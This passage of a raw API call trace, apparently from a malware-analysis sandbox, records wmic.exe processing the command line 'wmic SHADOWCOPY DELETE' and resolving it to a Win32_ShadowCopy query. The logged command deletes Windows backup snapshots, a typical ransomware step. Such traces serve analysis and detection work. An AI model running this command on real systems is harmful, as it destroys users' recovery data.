[0050.263] IUnknown:Release (This=0x217bd50) returned 0x0 [0050.263] IUnknown:Release (This=0x21778d0) returned 0x0 [0050.263] IUnknown:Release (This=0x217a280) returned 0x0 [0050.263] IXMLDOMNodeList:get_item (in: This=0x2179cc0, index=17, listItem=0x10f9f0 | out: listItem=0x10f9f0*=0x217bd50) returned 0x0 [0050.263] IXMLDOMNode:get_text (in: This=0x217bd50, text=0x10fa00 | out: text=0x10fa00*="mof.xsl") returned 0x0 [0050.263] IXMLDOMNode:get_attributes (in: This=0x217bd50, attributeMap=0x10f9f8 | out: attributeMap=0x10f9f8*=0x21778d0) returned 0x0 [0050.263] malloc (_Size=0x18) returned 0x26c670 [0050.263] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21778d0, name="KEYWORD", namedItem=0x10fa08 | out: namedItem=0x10fa08*=0x217a280) returned 0x0 [0050.263] free (_Block=0x26c670) [0050.263] IXMLDOMNode:get_nodeValue (in: This=0x217a280, value=0x10fa40 | out: value=0x10fa40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x4)) returned 0x0 [0050.263] malloc (_Size=0x18) returned 0x26c670 [0050.263] malloc (_Size=0x18) returned 0x26c690 [0050.263] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0050.263] SysStringLen (param_1="TABLE") returned 0x5 [0050.263] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0050.263] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.263] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0050.263] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0050.263] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0050.263] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0050.263] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.263] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0050.263] malloc (_Size=0x30) returned 0x2684c0 [0050.263] IUnknown:Release (This=0x217bd50) returned 0x0 [0050.263] IUnknown:Release (This=0x21778d0) returned 0x0 [0050.263] IUnknown:Release (This=0x217a280) returned 0x0 [0050.263] IXMLDOMNodeList:get_item (in: This=0x2179cc0, index=18, listItem=0x10f9f0 | out: listItem=0x10f9f0*=0x217bd50) returned 0x0 [0050.263] IXMLDOMNode:get_text (in: This=0x217bd50, text=0x10fa00 | out: text=0x10fa00*="mof.xsl") returned 0x0 [0050.263] IXMLDOMNode:get_attributes (in: This=0x217bd50, attributeMap=0x10f9f8 | out: attributeMap=0x10f9f8*=0x21778d0) returned 0x0 [0050.263] malloc (_Size=0x18) returned 0x26c6b0 [0050.264] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21778d0, name="KEYWORD", namedItem=0x10fa08 | out: namedItem=0x10fa08*=0x217a280) returned 0x0 [0050.264] free (_Block=0x26c6b0) [0050.264] IXMLDOMNode:get_nodeValue (in: This=0x217a280, value=0x10fa40 | out: value=0x10fa40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x4)) returned 0x0 [0050.264] malloc (_Size=0x18) returned 0x26c6b0 [0050.264] malloc (_Size=0x18) returned 0x26c6d0 [0050.264] SysStringLen (param_1="wmiclimofformat") returned 0xf [0050.264] SysStringLen (param_1="TABLE") returned 0x5 [0050.264] SysStringLen (param_1="wmiclimofformat") returned 0xf [0050.264] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.264] SysStringLen (param_1="wmiclimofformat") returned 0xf [0050.264] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0050.264] SysStringLen (param_1="wmiclimofformat") returned 0xf [0050.264] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0050.264] SysStringLen (param_1="wmiclimofformat") returned 0xf [0050.264] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0050.264] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.264] SysStringLen (param_1="wmiclimofformat") returned 0xf [0050.264] malloc (_Size=0x30) returned 0x268500 [0050.264] IUnknown:Release (This=0x217bd50) returned 0x0 [0050.264] IUnknown:Release (This=0x21778d0) returned 0x0 [0050.264] IUnknown:Release (This=0x217a280) returned 0x0 [0050.264] IXMLDOMNodeList:get_item (in: This=0x2179cc0, index=19, listItem=0x10f9f0 | out: listItem=0x10f9f0*=0x217bd50) returned 0x0 [0050.264] IXMLDOMNode:get_text (in: This=0x217bd50, text=0x10fa00 | out: text=0x10fa00*="textvaluelist.xsl") returned 0x0 [0050.264] IXMLDOMNode:get_attributes (in: This=0x217bd50, attributeMap=0x10f9f8 | out: attributeMap=0x10f9f8*=0x21778d0) returned 0x0 [0050.264] malloc (_Size=0x18) returned 0x26c6f0 [0050.264] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21778d0, name="KEYWORD", namedItem=0x10fa08 | out: namedItem=0x10fa08*=0x217a280) returned 0x0 [0050.264] free (_Block=0x26c6f0) [0050.265] IXMLDOMNode:get_nodeValue (in: This=0x217a280, value=0x10fa40 | out: value=0x10fa40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x4)) returned 0x0 [0050.265] malloc (_Size=0x18) returned 0x26c6f0 [0050.265] malloc (_Size=0x18) returned 0x26c710 [0050.265] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0050.265] SysStringLen (param_1="TABLE") returned 0x5 [0050.265] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0050.265] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.265] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0050.265] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0050.265] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0050.265] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0050.265] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0050.265] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0050.265] malloc (_Size=0x30) returned 0x268540 [0050.265] IUnknown:Release (This=0x217bd50) returned 0x0 [0050.265] IUnknown:Release (This=0x21778d0) returned 0x0 [0050.265] IUnknown:Release (This=0x217a280) returned 0x0 [0050.265] IXMLDOMNodeList:get_item (in: This=0x2179cc0, index=20, listItem=0x10f9f0 | out: listItem=0x10f9f0*=0x217bd50) returned 0x0 [0050.265] IXMLDOMNode:get_text (in: This=0x217bd50, text=0x10fa00 | out: text=0x10fa00*="textvaluelist.xsl") returned 0x0 [0050.265] IXMLDOMNode:get_attributes (in: This=0x217bd50, attributeMap=0x10f9f8 | out: attributeMap=0x10f9f8*=0x21778d0) returned 0x0 [0050.265] malloc (_Size=0x18) returned 0x26c730 [0050.265] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21778d0, name="KEYWORD", namedItem=0x10fa08 | out: namedItem=0x10fa08*=0x217a280) returned 0x0 [0050.265] free (_Block=0x26c730) [0050.265] IXMLDOMNode:get_nodeValue (in: This=0x217a280, value=0x10fa40 | out: value=0x10fa40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x4)) returned 0x0 [0050.265] malloc (_Size=0x18) returned 0x26c730 [0050.265] malloc (_Size=0x18) returned 0x26c750 [0050.265] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0050.266] SysStringLen (param_1="TABLE") returned 0x5 [0050.266] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0050.266] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.266] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0050.266] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0050.266] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0050.266] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0050.266] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0050.266] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0050.266] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0050.266] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0050.266] malloc (_Size=0x30) returned 0x268580 [0050.266] IUnknown:Release (This=0x217bd50) returned 0x0 [0050.266] IUnknown:Release (This=0x21778d0) returned 0x0 [0050.266] IUnknown:Release (This=0x217a280) returned 0x0 [0050.266] IUnknown:Release (This=0x2179cc0) returned 0x0 [0050.266] FreeThreadedDOMDocument:IUnknown:Release (This=0x217bc50) returned 0x1 [0050.266] FreeThreadedDOMDocument:IUnknown:Release (This=0x21771d0) returned 0x0 [0050.266] free (_Block=0x266d70) [0050.266] GetCommandLineW () returned="wmic SHADOWCOPY DELETE" [0050.323] malloc (_Size=0x30) returned 0x2685c0 [0050.323] memcpy_s (in: _Destination=0x2685c0, _DestinationSize=0x2e, _Source=0x3025be, _SourceSize=0x2e | out: _Destination=0x2685c0) returned 0x0 [0050.323] malloc (_Size=0x18) returned 0x26c770 [0050.323] malloc (_Size=0x18) returned 0x26c790 [0050.323] malloc (_Size=0x18) returned 0x26c7b0 [0050.323] malloc (_Size=0x18) returned 0x26c7d0 [0050.323] malloc (_Size=0x80) returned 0x266d70 [0050.323] GetLocalTime (in: lpSystemTime=0x10fbb0 | out: lpSystemTime=0x10fbb0*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x4, wDay=0x5, wHour=0x4, wMinute=0x5, wSecond=0x32, wMilliseconds=0x1b0)) [0050.324] _vsnwprintf (in: _Buffer=0x266d70, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x10fb08 | out: _Buffer="03-05-2020T04:05:50") returned 19 [0050.324] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0050.324] malloc (_Size=0x28) returned 0x266e70 [0050.324] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0050.324] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0050.324] malloc (_Size=0x28) returned 0x266ea0 [0050.324] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0050.324] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0050.324] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0050.324] malloc (_Size=0x16) returned 0x26c7f0 [0050.324] lstrlenW (lpString="SHADOWCOPY") returned 10 [0050.324] _wcsicmp (_String1="SHADOWCOPY", _String2="\"NULL\"") returned 81 [0050.324] malloc (_Size=0x16) returned 0x26c810 [0050.324] malloc (_Size=0x8) returned 0x266e00 [0050.324] free (_Block=0x0) [0050.324] free (_Block=0x26c7f0) [0050.324] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0050.324] malloc (_Size=0xe) returned 0x26c7f0 [0050.324] lstrlenW (lpString="DELETE") returned 6 [0050.324] _wcsicmp (_String1="DELETE", _String2="\"NULL\"") returned 66 [0050.324] malloc (_Size=0xe) returned 0x26c830 [0050.324] malloc (_Size=0x10) returned 0x26c850 [0050.324] memmove_s (in: _Destination=0x26c850, _DestinationSize=0x8, _Source=0x266e00, _SourceSize=0x8 | out: _Destination=0x26c850) returned 0x0 [0050.324] free (_Block=0x266e00) [0050.324] free (_Block=0x0) [0050.324] free (_Block=0x26c7f0) [0050.324] malloc (_Size=0x10) returned 0x26c7f0 [0050.324] lstrlenW (lpString="QUIT") returned 4 [0050.324] lstrlenW (lpString="SHADOWCOPY") returned 10 [0050.324] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0050.325] lstrlenW (lpString="EXIT") returned 4 [0050.325] lstrlenW (lpString="SHADOWCOPY") returned 10 [0050.325] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0050.325] free (_Block=0x26c7f0) [0050.325] WbemLocator:IUnknown:AddRef (This=0x1d11390) returned 0x2 [0050.325] malloc (_Size=0x10) returned 0x26c7f0 [0050.325] lstrlenW (lpString="/") returned 1 [0050.325] lstrlenW (lpString="SHADOWCOPY") returned 10 [0050.325] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0050.325] lstrlenW (lpString="-") returned 1 [0050.325] lstrlenW (lpString="SHADOWCOPY") returned 10 [0050.325] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0050.325] lstrlenW (lpString="CLASS") returned 5 [0050.325] lstrlenW (lpString="SHADOWCOPY") returned 10 [0050.325] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0050.325] lstrlenW (lpString="PATH") returned 4 [0050.325] lstrlenW (lpString="SHADOWCOPY") returned 10 [0050.325] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0050.325] lstrlenW (lpString="CONTEXT") returned 7 [0050.325] lstrlenW (lpString="SHADOWCOPY") returned 10 [0050.325] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0050.325] lstrlenW (lpString="SHADOWCOPY") returned 10 [0050.325] malloc (_Size=0x16) returned 0x26c870 [0050.325] lstrlenW (lpString="SHADOWCOPY") returned 10 [0050.329] GetCurrentThreadId () returned 0x20c [0050.329] ??0CHString@@QEAA@XZ () returned 0x10f9c0 [0050.329] malloc (_Size=0x18) returned 0x26c890 [0050.329] malloc (_Size=0x18) returned 0x26c8b0 [0050.329] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1d11390, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff502998 | out: ppNamespace=0xff502998*=0x1d23a98) returned 0x0 [0050.867] free (_Block=0x26c8b0) [0050.867] free (_Block=0x26c890) [0050.867] CoSetProxyBlanket (pProxy=0x1d23a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0050.867] ??1CHString@@QEAA@XZ () returned 0x7fef4a8482c [0050.867] GetCurrentThreadId () returned 0x20c [0050.867] ??0CHString@@QEAA@XZ () returned 0x10f858 [0050.867] malloc (_Size=0x18) returned 0x26c890 [0050.867] malloc (_Size=0x18) returned 0x26c8b0 [0050.867] malloc (_Size=0x18) returned 0x26c8d0 [0050.868] malloc (_Size=0x18) returned 0x26c8f0 [0050.868] SysStringLen (param_1="root\\cli") returned 0x8 [0050.868] SysStringLen (param_1="\\") returned 0x1 [0050.868] malloc (_Size=0x18) returned 0x26c910 [0050.868] SysStringLen (param_1="root\\cli\\") returned 0x9 [0050.868] SysStringLen (param_1="ms_409") returned 0x6 [0050.868] free (_Block=0x26c8f0) [0050.868] free (_Block=0x26c8d0) [0050.868] free (_Block=0x26c8b0) [0050.868] free (_Block=0x26c890) [0050.868] malloc (_Size=0x18) returned 0x26c890 [0050.868] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1d11390, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff5029a0 | out: ppNamespace=0xff5029a0*=0x1d23b28) returned 0x0 [0050.877] free (_Block=0x26c890) [0050.877] free (_Block=0x26c910) [0050.877] ??1CHString@@QEAA@XZ () returned 0x7fef4a8482c [0050.877] GetCurrentThreadId () returned 0x20c [0050.877] ??0CHString@@QEAA@XZ () returned 0x10f9d0 [0050.877] malloc (_Size=0x18) returned 0x26c910 [0050.877] malloc (_Size=0x18) returned 0x26c890 [0050.877] malloc (_Size=0x18) returned 0x26c8b0 [0050.877] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0050.877] malloc (_Size=0x3a) returned 0x26ca40 [0050.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff491980, cbMultiByte=-1, lpWideCharStr=0x26ca40, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0050.877] free (_Block=0x26ca40) [0050.877] malloc (_Size=0x18) returned 0x26c8d0 [0050.877] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0050.877] SysStringLen (param_1="SHADOWCOPY") returned 0xa [0050.877] malloc (_Size=0x18) returned 0x26c8f0 [0050.877] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SHADOWCOPY") returned 0x26 [0050.877] SysStringLen (param_1="'") returned 0x1 [0050.877] free (_Block=0x26c8d0) [0050.877] free (_Block=0x26c8b0) [0050.877] free (_Block=0x26c890) [0050.878] free (_Block=0x26c910) [0050.878] IWbemServices:GetObject (in: This=0x1d23a98, strObjectPath="MSFT_CliAlias.FriendlyName='SHADOWCOPY'", lFlags=0, pCtx=0x0, ppObject=0x10f9d8*=0x0, ppCallResult=0x0 | out: ppObject=0x10f9d8*=0x1d304e0, ppCallResult=0x0) returned 0x0 [0051.056] malloc (_Size=0x18) returned 0x26c910 [0051.056] IWbemClassObject:Get (in: This=0x1d304e0, wszName="Target", lFlags=0, pVal=0x10f900*(varType=0x0, wReserved1=0xff50, wReserved2=0x0, wReserved3=0x0, varVal1=0xff502998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x10f900*(varType=0x8, wReserved1=0xff50, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0051.056] free (_Block=0x26c910) [0051.056] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0051.056] malloc (_Size=0x3e) returned 0x26ca40 [0051.056] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0051.056] malloc (_Size=0x18) returned 0x26c910 [0051.056] IWbemClassObject:Get (in: This=0x1d304e0, wszName="PWhere", lFlags=0, pVal=0x10f900*(varType=0x0, wReserved1=0xff50, wReserved2=0x0, wReserved3=0x0, varVal1=0x32e058, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x10f900*(varType=0x8, wReserved1=0xff50, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0051.056] free (_Block=0x26c910) [0051.056] lstrlenW (lpString=" Where ID = '#'") returned 15 [0051.056] malloc (_Size=0x20) returned 0x26ca90 [0051.056] lstrlenW (lpString=" Where ID = '#'") returned 15 [0051.056] malloc (_Size=0x18) returned 0x26c910 [0051.056] IWbemClassObject:Get (in: This=0x1d304e0, wszName="Connection", lFlags=0, pVal=0x10f900*(varType=0x0, wReserved1=0xff50, wReserved2=0x0, wReserved3=0x0, varVal1=0x37d6c8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x10f900*(varType=0xd, wReserved1=0xff50, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d309c0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0051.057] free (_Block=0x26c910) [0051.057] IUnknown:QueryInterface (in: This=0x1d309c0, riid=0xff497360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x10f8f0 | out: ppvObject=0x10f8f0*=0x1d309c0) returned 0x0 [0051.057] GetCurrentThreadId () returned 0x20c [0051.057] ??0CHString@@QEAA@XZ () returned 0x10f818 [0051.057] malloc (_Size=0x18) returned 0x26c910 [0051.057] IWbemClassObject:Get (in: This=0x1d309c0, wszName="Namespace", lFlags=0, pVal=0x10f840*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff4a738f, varVal2=0x26c910), pType=0x0, plFlavor=0x0 | out: pVal=0x10f840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x26c910), pType=0x0, plFlavor=0x0) returned 0x0 [0051.057] free (_Block=0x26c910) [0051.057] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0051.057] malloc (_Size=0x16) returned 0x26c910 [0051.057] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0051.057] malloc (_Size=0x18) returned 0x26c890 [0051.057] IWbemClassObject:Get (in: This=0x1d309c0, wszName="Locale", lFlags=0, pVal=0x10f840*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a96c8, varVal2=0x26c910), pType=0x0, plFlavor=0x0 | out: pVal=0x10f840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x26c910), pType=0x0, plFlavor=0x0) returned 0x0 [0051.057] free (_Block=0x26c890) [0051.057] lstrlenW (lpString="ms_409") returned 6 [0051.057] malloc (_Size=0xe) returned 0x26c890 [0051.057] lstrlenW (lpString="ms_409") returned 6 [0051.057] malloc (_Size=0x18) returned 0x26c8b0 [0051.057] IWbemClassObject:Get (in: This=0x1d309c0, wszName="User", lFlags=0, pVal=0x10f840*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a96c8, varVal2=0x26c910), pType=0x0, plFlavor=0x0 | out: pVal=0x10f840*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a96c8, varVal2=0x26c910), pType=0x0, plFlavor=0x0) returned 0x0 [0051.057] free (_Block=0x26c8b0) [0051.057] malloc (_Size=0x18) returned 0x26c8b0 [0051.057] IWbemClassObject:Get (in: This=0x1d309c0, wszName="Password", lFlags=0, pVal=0x10f840*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a96c8, varVal2=0x26c910), pType=0x0, plFlavor=0x0 | out: pVal=0x10f840*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a96c8, varVal2=0x26c910), pType=0x0, plFlavor=0x0) returned 0x0 [0051.057] free (_Block=0x26c8b0) [0051.057] malloc (_Size=0x18) returned 0x26c8b0 [0051.058] IWbemClassObject:Get (in: This=0x1d309c0, wszName="Server", lFlags=0, pVal=0x10f840*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a96c8, varVal2=0x26c910), pType=0x0, plFlavor=0x0 | out: pVal=0x10f840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x26c910), pType=0x0, plFlavor=0x0) returned 0x0 [0051.058] free (_Block=0x26c8b0) [0051.058] lstrlenW (lpString=".") returned 1 [0051.058] malloc (_Size=0x4) returned 0x266e00 [0051.058] lstrlenW (lpString=".") returned 1 [0051.058] malloc (_Size=0x18) returned 0x26c8b0 [0051.058] IWbemClassObject:Get (in: This=0x1d309c0, wszName="Authority", lFlags=0, pVal=0x10f840*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a96c8, varVal2=0x26c910), pType=0x0, plFlavor=0x0 | out: pVal=0x10f840*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a96c8, varVal2=0x26c910), pType=0x0, plFlavor=0x0) returned 0x0 [0051.058] free (_Block=0x26c8b0) [0051.058] ??1CHString@@QEAA@XZ () returned 0x7fef4a8482c [0051.058] IUnknown:Release (This=0x1d309c0) returned 0x1 [0051.058] GetCurrentThreadId () returned 0x20c [0051.058] ??0CHString@@QEAA@XZ () returned 0x10f818 [0051.058] malloc (_Size=0x18) returned 0x26c8b0 [0051.058] IWbemClassObject:Get (in: This=0x1d304e0, wszName="__RELPATH", lFlags=0, pVal=0x10f840*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a96c8, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0x10f840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0 [0051.058] free (_Block=0x26c8b0) [0051.058] malloc (_Size=0x18) returned 0x26c8b0 [0051.058] GetCurrentThreadId () returned 0x20c [0051.058] ??0CHString@@QEAA@XZ () returned 0x10f698 [0051.079] ??0CHString@@QEAA@PEBG@Z () returned 0x10f6b0 [0051.099] ??0CHString@@QEAA@AEBV0@@Z () returned 0x10f640 [0051.099] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4a8482c [0051.099] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x26cac0 [0051.099] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0051.099] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x10f600 [0051.100] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x10f648 [0051.100] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x10f6b0 [0051.100] ??1CHString@@QEAA@XZ () returned 0x49116601 [0051.100] ??1CHString@@QEAA@XZ () returned 0x49116601 [0051.100] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x10f608 [0051.100] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x10f640 [0051.100] ??1CHString@@QEAA@XZ () returned 0x1 [0051.100] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x26cb30 [0051.100] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa [0051.100] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x10f600 [0051.100] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x10f648 [0051.100] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x10f6b0 [0051.100] ??1CHString@@QEAA@XZ () returned 0x49116601 [0051.100] ??1CHString@@QEAA@XZ () returned 0x49116601 [0051.100] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x10f608 [0051.100] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x10f640 [0051.100] ??1CHString@@QEAA@XZ () returned 0x7fef4a8482c [0051.100] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef4a84820 [0051.100] ??1CHString@@QEAA@XZ () returned 0x7fef4a8482c [0051.100] malloc (_Size=0x18) returned 0x26c8d0 [0051.101] malloc (_Size=0x18) returned 0x26c930 [0051.101] malloc (_Size=0x18) returned 0x26c950 [0051.101] malloc (_Size=0x18) returned 0x26c970 [0051.101] malloc (_Size=0x18) returned 0x26c990 [0051.101] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0051.101] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0051.101] malloc (_Size=0x18) returned 0x26c9b0 [0051.101] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0051.101] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0051.101] malloc (_Size=0x18) returned 0x26c9d0 [0051.101] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0051.101] SysStringLen (param_1="\"") returned 0x1 [0051.101] free (_Block=0x26c9b0) [0051.101] free (_Block=0x26c990) [0051.101] free (_Block=0x26c970) [0051.101] free (_Block=0x26c950) [0051.101] free (_Block=0x26c930) [0051.101] free (_Block=0x26c8d0) [0051.101] IWbemServices:GetObject (in: This=0x1d23b28, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x10f688*=0x0, ppCallResult=0x0 | out: ppObject=0x10f688*=0x1d30a50, ppCallResult=0x0) returned 0x0 [0051.406] malloc (_Size=0x18) returned 0x26c8d0 [0051.406] IWbemClassObject:Get (in: This=0x1d30a50, wszName="Text", lFlags=0, pVal=0x10f6c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff502ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0x10f6c0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a8d50*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x32ddf0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0 [0051.406] free (_Block=0x26c8d0) [0051.406] SafeArrayGetLBound (in: psa=0x3a8d50, nDim=0x1, plLbound=0x10f6a0 | out: plLbound=0x10f6a0) returned 0x0 [0051.406] SafeArrayGetUBound (in: psa=0x3a8d50, nDim=0x1, plUbound=0x10f690 | out: plUbound=0x10f690) returned 0x0 [0051.406] SafeArrayGetElement (in: psa=0x3a8d50, rgIndices=0x10f684, pv=0x10f6d8 | out: 